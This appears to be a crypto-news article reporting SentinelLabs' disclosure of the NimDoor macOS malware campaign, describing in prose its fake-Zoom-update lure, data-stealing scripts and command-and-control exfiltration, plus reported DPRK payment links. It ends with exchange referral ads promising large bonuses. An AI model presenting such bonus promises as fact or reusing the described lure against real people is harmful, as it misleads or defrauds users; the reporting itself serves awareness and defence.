NimDoor Cyberattack Targets macOS
SentinelLabs has disclosed a sophisticated malware campaign, NimDoor, targeting macOS devices and attributed to North Korean threat actors. The attack employs social engineering, the Nim programming language, and advanced data extraction techniques against small Web3 firms.
Warning: NimDoor Malware Campaign Targets macOS Devices
SentinelLabs, the threat intelligence arm of cybersecurity company SentinelOne, has uncovered a sophisticated attack campaign known as NimDoor, targeting macOS systems and allegedly orchestrated by North Korean state-sponsored actors.
Attack Vector
According to SentinelLabs' detailed report, the campaign begins with social engineering. Attackers impersonate trusted contacts and propose meetings through Calendly. Victims then receive a fraudulent email urging them to update Zoom, which includes a script containing three lines of malicious code. This code triggers the download of a second-stage payload.
Upon clicking the embedded Zoom link, two macOS binary files are automatically downloaded from a legitimate-looking server. These initiate two separate execution chains: one gathers general system and app-specific data; the other establishes persistent access to the system.
The next stage deploys two Bash scripts via a trojan mechanism. The first targets data from browsers like Arc, Brave, Firefox, Chrome, and Edge. The second extracts encrypted Telegram data along with the decryption blob, sending all collected data to a command-and-control server.
The campaign’s complexity is heightened by its use of the Nim programming language, which complicates detection and analysis for cybersecurity professionals.
Financial Trail
Blockchain researcher ZachXBT has also identified financial transactions potentially linked to the attack. According to his findings, approximately $2.76 million USD in USDC is sent monthly from Circle accounts to wallets associated with developers from the Democratic People’s Republic of Korea (DPRK).
These addresses are reportedly linked to previously sanctioned individuals, including Sim Hyun Sop, blacklisted by Tether in 2023. ZachXBT notes that hiring developers from North Korea significantly increases the risk to the project's integrity and security.
"Hiring multiple DPRK IT workers is a strong indicator a startup will eventually fail. These workers are not particularly skilled — the risk often stems from the hiring team’s negligence,” ZachXBT warned.
💸💲🧠 Get up to 5020 USDT as a welcome bonus and an additional 1025 USDT by using this referral on Bybit
Earn $25 right now!
$25 welcome bonus to all new Binance users.
